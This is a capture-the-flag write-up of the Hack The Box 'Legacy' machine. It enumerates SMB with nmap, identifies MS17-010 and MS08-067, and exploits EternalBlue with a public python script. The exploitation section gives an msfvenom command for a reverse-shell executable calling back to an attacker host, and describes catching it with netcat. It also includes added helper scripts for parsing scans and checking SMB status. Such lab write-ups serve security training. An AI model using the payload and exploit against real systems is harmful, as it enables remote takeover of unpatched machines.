created by ch4p // 10.10.10.4
// Enumeration //
Legacy is yet another simplistic boot-to-root machine, and we will be exploiting it using one of the most popular exploits to ever exist. We'll yet again start off with an nmap scan, grabbing open ports and service versions. The syntax below scans all 65,535 TCP ports (a SYN scan when run as root, a TCP connect scan otherwise); -A enables OS detection, version detection, the default NSE scripts and traceroute, -Pn skips host discovery (the box may not answer pings), and -v prints progress verbosely. The -oG flag writes the results in greppable format to the file path specified.
nmap -Pn -A -p- -v 10.10.10.4 -oG /home/rp/Desktop/Legacy/nmap
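The greppable output is one tab-separated line per host, with the Ports field holding comma-separated port/state/proto/owner/service/rpc_info/version entries. As an added example (not part of the original writeup), here is a small parser for that format, run over a constructed sample modelled on the scan above; the service banners and the closed 3389 port are illustrative, not copied from a real scan.

```python
# Added example: parse nmap -oG (greppable) output and pull out open ports.
# SAMPLE_GNMAP is constructed for this example, not real scan output.
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated as: nmap -Pn -A -p- -v 10.10.10.4 -oG nmap\n"
    "Host: 10.10.10.4 ()\tStatus: Up\n"
    "Host: 10.10.10.4 ()\tPorts: "
    "139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, "
    "445/open/tcp//microsoft-ds//Windows XP microsoft-ds/, "
    "3389/closed/tcp//ms-wbt-server///"
    "\tIgnored State: filtered (65532)\tOS: Microsoft Windows XP|2003\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)

# The seven '/'-separated fields of each port entry, in nmap's order.
PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc_info", "version")


def parse_gnmap(text):
    """Return {ip: [port records]} from greppable nmap output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # skip the '# Nmap ...' comment lines
        # Every field on a Host line is "Key: value", separated by tabs.
        fields = {}
        for chunk in line.split("\t"):
            key, _, value = chunk.partition(": ")
            fields[key] = value
        ip = fields["Host"].split()[0]  # "10.10.10.4 ()" -> "10.10.10.4"
        hosts.setdefault(ip, [])
        if "Ports" not in fields:
            continue  # the "Status: Up" line carries no port data
        for entry in fields["Ports"].split(", "):
            # nmap escapes any '/' inside a field as '|', so splitting on '/'
            # yields the seven fields plus one trailing empty string.
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            rec = dict(zip(PORT_FIELDS, parts[:7]))
            rec["port"] = int(rec["port"])
            hosts[ip].append(rec)
    return hosts


def open_ports(hosts, ip):
    """Sorted list of open port numbers for one host."""
    return sorted(p["port"] for p in hosts.get(ip, []) if p["state"] == "open")


def smb_exposed(hosts):
    """Hosts reachable over SMB: direct-hosted on 445 or NetBIOS session on 139."""
    return sorted(
        ip
        for ip, ports in hosts.items()
        if any(p["port"] in (139, 445) and p["state"] == "open" for p in ports)
    )


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    for ip in parsed:
        print(ip, "open:", open_ports(parsed, ip))
    print("SMB exposed:", smb_exposed(parsed))
```

The same functions work unchanged on a real -oG file (open it and pass its contents to parse_gnmap), which is the point of that output format: it is meant to be fed to tools rather than read.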
Really not much to go off, except SMB. I'll try my usual smbmap, but it turns up no results. Let's see if NSE can help us again. NSE ships with quite a few SMB scripts, which you can list with the locate command (after refreshing its database with updatedb).
sudo updatedb
locate '*.nse' | grep smb
We can go ahead and run the relevant ones via the vuln script category, which includes smb-vuln-ms17-010 and smb-vuln-ms08-067, by typing the syntax below:
nmap -Pn --script vuln -p 445 10.10.10.4
This returns two of the most widely exploited SMB vulnerabilities of all time, CVE-2017-0143 and CVE-2008-4250. You may know CVE-2017-0143 better as MS17-010, popularly called EternalBlue. This is the SMBv1 flaw that allowed the ransomware known as 'WannaCry' to propagate in 2017. Our other CVE, 2008-4250, is popularly known as 'NetAPI' or MS08-067. It is a stack buffer overflow in the Server service's path canonicalisation code in netapi32.dll, triggered by a specially crafted RPC request, and it hands the attacker a SYSTEM shell. Both of these vulnerabilities have Metasploit modules associated with them.
Note: MS17-010 exploits are known to blue-screen the target. If the exploit runs and you lose your session, it is likely you won't be able to get back in until the machine is reset.
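Both the nmap script and Metasploit's MS17-010 checker work the same way: negotiate an SMBv1 session, send an SMB_COM_TRANSACTION request, and read the NT status in the reply, where STATUS_INSUFF_SERVER_RESOURCES (0xC0000205) marks an unpatched host. As an added example (not part of this writeup and not helviojunior's script), the block below builds the SMBv1 negotiate request on the wire, parses a constructed reply, and classifies the status the way those checks do. The Flags/Flags2 values are typical client settings chosen for illustration, and the TID/UID in the constructed reply are made up.

```python
# Added example: SMBv1 message framing and the MS17-010 status check.
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
SMB_COM_TRANSACTION = 0x25  # the request the MS17-010 check probes with
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched hosts answer with this
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_INVALID_HANDLE = 0xC0000008

# SMB1 header (32 bytes, little-endian): magic, command, NT status, flags,
# flags2, PID high, security features, reserved, TID, PID low, UID, MID.
HEADER_FMT = "<4sBIBHH8sHHHHH"
HEADER_LEN = struct.calcsize(HEADER_FMT)


def build_smb_header(command, status=0, flags=0x18, tid=0, pid=0, uid=0, mid=0):
    # flags 0x18 (canonical, case-insensitive paths) and flags2 0xC807 (unicode,
    # NT status codes, long names) are typical client values; assumption only.
    return struct.pack(HEADER_FMT, SMB_MAGIC, command, status, flags, 0xC807,
                       0, bytes(8), 0, tid, pid, uid, mid)


def wrap_netbios(smb):
    # NetBIOS session service header: type 0x00 + 3-byte big-endian length.
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def build_negotiate_request(mid=1):
    # Offer only the SMB1 "NT LM 0.12" dialect; a server that accepts it
    # still speaks SMBv1, which both MS17-010 and MS08-067 checks rely on.
    dialects = b"\x02NT LM 0.12\x00"
    body = bytes([0]) + struct.pack("<H", len(dialects)) + dialects  # WordCount, ByteCount
    return wrap_netbios(build_smb_header(SMB_COM_NEGOTIATE, mid=mid) + body)


def parse_smb_response(data):
    """Split a NetBIOS-framed SMB1 message into header fields and body."""
    if len(data) < 4 or data[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    length = int.from_bytes(data[1:4], "big")
    smb = data[4:4 + length]
    if len(smb) != length or len(smb) < HEADER_LEN:
        raise ValueError("truncated SMB message")
    (magic, command, status, flags, flags2, _pid_hi, _sec, _res,
     tid, pid, uid, mid) = struct.unpack(HEADER_FMT, smb[:HEADER_LEN])
    if magic != SMB_MAGIC:
        raise ValueError("bad SMB magic")
    return {"command": command, "status": status, "tid": tid, "pid": pid,
            "uid": uid, "mid": mid, "is_response": bool(flags & 0x80),
            "body": smb[HEADER_LEN:]}


def classify_ms17_010(status):
    """Interpret the TRANSACTION reply status the way the nmap/MSF checks do."""
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "likely vulnerable"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "likely patched"
    return "inconclusive"


# Constructed reply (not captured traffic): a TRANSACTION response with the
# vulnerable status, reply flag set, WordCount=0 and ByteCount=0.
CONSTRUCTED_VULN_REPLY = wrap_netbios(
    build_smb_header(SMB_COM_TRANSACTION, status=STATUS_INSUFF_SERVER_RESOURCES,
                     flags=0x98, tid=0x0801, uid=0x0800, mid=1) + b"\x00\x00\x00"
)

if __name__ == "__main__":
    print("negotiate request:", build_negotiate_request().hex())
    reply = parse_smb_response(CONSTRUCTED_VULN_REPLY)
    print("status 0x%08X ->" % reply["status"], classify_ms17_010(reply["status"]))
```

The classification is a heuristic, which is why the scripts report "likely" rather than "confirmed": the same status can come from a patched host under genuine resource pressure, and a patched host usually answers the probe with STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE instead.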
// Exploitation //
Let's try out EternalBlue first. Metasploit is boring, so we'll use a python script, kindly maintained by helviojunior over on GitHub. While the script lets you pass in credentials, they aren't required and it defaults to an anonymous (null session) login if none are supplied. All we need is the target IP and a payload executable. We'll use msfvenom to craft that second part.
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.14.23 LPORT=443 -f exe > supersafe.exe
LHOST is your local machine (the attacker) and LPORT is the port you'll listen on; a port like 443 is a good choice because it is rarely blocked outbound. Now we'll open a netcat listener on the LPORT to catch this shell, and use the python script to send the executable over and run it.
Note: if you're super lucky like me, you may need to install the impacket module for this script to work.
pip install impacket
We're able to change directory to C:\, and since the exploit executes its payload from the context of the SMB server, odds are we're SYSTEM (Windows XP ships without a whoami to confirm it). Let's find the flags.
With Metasploit, it's pretty much the same as any other module. And by that, I mean boring. We'll use NetAPI (MS08-067) for funsies.